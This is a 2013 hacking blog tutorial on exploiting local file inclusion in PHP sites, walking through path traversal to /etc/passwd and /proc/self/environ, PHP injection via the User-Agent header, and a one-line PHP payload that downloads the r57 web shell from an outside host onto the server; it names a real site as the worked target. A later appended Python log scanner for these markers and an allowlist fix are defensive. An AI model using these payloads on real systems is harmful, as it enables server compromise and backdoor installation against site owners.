Wednesday 9 January 2013

LFI and Shell uploading

Hi.... Today we are going to see an LFI attack using the Tamper Data add-on for Firefox..


First of all we need a website vulnerable to LFI...
There are plenty of tools which can help you find an LFI-vulnerable website..
If you don't have any such tool then you can download one from here.

How to check for LFI vulnerability on a website:-
If our target is something like this..

http://www.url.com/view.php?page=about.php


then replace about.php with ../
so now the url will become http://www.url.com/view.php?page=../

Check the source code (press Ctrl+U) and see if you get an error like
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/.....
If so, there is a high chance that the website is LFI vulnerable.

Now check if you can access /etc/passwd. For that just add /etc/passwd at the end of the url, so the url will be like http://www.url.com/view.php?page=../etc/passwd

If you get an error "failed to open /etc/passwd no such file or directory", then add ../ before /etc/passwd
and keep on adding until you get access to /etc/passwd.
You will get an output like
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

Once you get access to /etc/passwd, now try to access /proc/self/environ. For that replace /etc/passwd:
if your url is http://www.url.com/view.php?page=../../../../../etc/passwd then it will become like this
http://www.url.com/view.php?page=../../../../../proc/self/environ

and check if there is any remote address etc...
If you get any output for this file, that means we can attack this website using this method..

For this tutorial I will use,
http://www.pscet.in/index.php?page=../../../../../../../../../../etc/passwd


Now check for /proc/self/environ

Now we are going to use Firefox and Tamper Data for the attack.
Download and install the Tamper Data add-on in Firefox.
Start Tamper Data:
press Alt+T --> Tamper Data

Click on Start Tamper
Reload the page..
After that Tamper Data will ask you whether to tamper the data; click on Tamper.

Now go to the User-Agent field and at the end add <?phpinfo()?>  then click OK.
Now check if you get any reply from the server.....
You should get all the information about the PHP version and other details about PHP running on that server..
Now it is time to upload our shell on that website....
I suggest you visit http://www.c99shell.gen.tr; this website contains all the types of shell you need to hack any website. Use c99 or r57 (there is a txt version of every shell; first open the txt file which contains the php code, and if it doesn't open then you should use another shell). For this tutorial I will use the r57 shell....

The process is the same: go to Tamper Data --> Start Tamper --> reload the page --> go to the User-Agent field

Generally we use the system() or exec() function to upload our shell, but in most cases both functions are blocked (even on this target both are blocked). To check whether they are blocked or not, add the php script <?system('uname -a');?> and check the reply. If you don't get any reply on your page then check the source code and see there whether the function is blocked; you will get the message "system() is blocked for security reason".

So, we will use another method which is generally not blocked on any website:
use the following php string in the User-Agent field.

<?php $file = fopen("r57.php", "w+"); $stream = fopen("http://www.c99shell.gen.tr/r57.txt", "r"); $shell = ""; while (!feof($stream)) { $shell .= fgets($stream); } fwrite($file, $shell); fclose($file); ?>

You can change the link and the name of the shell.....

That's it, your shell has been uploaded......
To start the shell go to http://url/nameofshell.php
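From the defender's side, every step of this walkthrough leaves a recognisable trace in the web server's access log: the ../ sequences in the page parameter, the /etc/passwd and /proc/self/environ targets, and a PHP tag in the User-Agent header. The following Python script, added here as an example and not part of the original post, flags those markers in Apache combined-format log lines; the log lines, timestamps and client address are constructed, not taken from any real server.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format log lines (made up for this example; the
# client address is from the 203.0.113.0/24 documentation range).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jan/2013:10:00:01 +0000] "GET /view.php?page=about.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Jan/2013:10:00:07 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Jan/2013:10:00:12 +0000] "GET /view.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Jan/2013:10:00:20 +0000] "GET /view.php?page=../../../../../proc/self/environ HTTP/1.1" 200 9001 "-" "Mozilla/5.0 <?php phpinfo(); ?>"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL = re.compile(r'\.\.[/\\]')                              # ../ or ..\ after decoding
SENSITIVE = re.compile(r'/(?:etc/passwd|proc/self/environ)\b', re.I)
PHP_TAG = re.compile(r'<\?(?:php\b|=)?', re.I)                    # <?php, <?= or bare <? (tune for <?xml)

def classify(line):
    # Returns a finding record for one log line, or None if the line does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(unquote(m['path']))   # decode twice so double-encoded ../ is still caught
    findings = []
    if TRAVERSAL.search(path):
        findings.append('traversal')
    if SENSITIVE.search(path):
        findings.append('sensitive_file')
    if PHP_TAG.search(unquote(m['ua'])) or PHP_TAG.search(unquote(m['ref'])):
        findings.append('php_tag_in_header')   # the /proc/self/environ injection step
    status = int(m['status'])
    severity = 'none'
    if 'php_tag_in_header' in findings and 'sensitive_file' in findings:
        severity = 'critical'                  # code-injection attempt, not just a file read
    elif 'sensitive_file' in findings:
        severity = 'high' if status == 200 else 'medium'   # 200 is a triage hint, not proof
    elif findings:
        severity = 'medium'
    return {'ip': m['ip'], 'ts': m['ts'], 'status': status,
            'findings': findings, 'severity': severity}

def scan(log_text):
    # Records for every line that carries at least one finding, in log order.
    records = (classify(l) for l in log_text.splitlines())
    return [r for r in records if r and r['findings']]
```

Detection is the second line of defence; the root fix for the view.php pattern above is to never pass user input to include() and instead map the page parameter through a fixed allowlist of files.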

This tutorial is for education purpose only... don't use this information for any wrong purpose....

I have uploaded a video based on this tutorial....
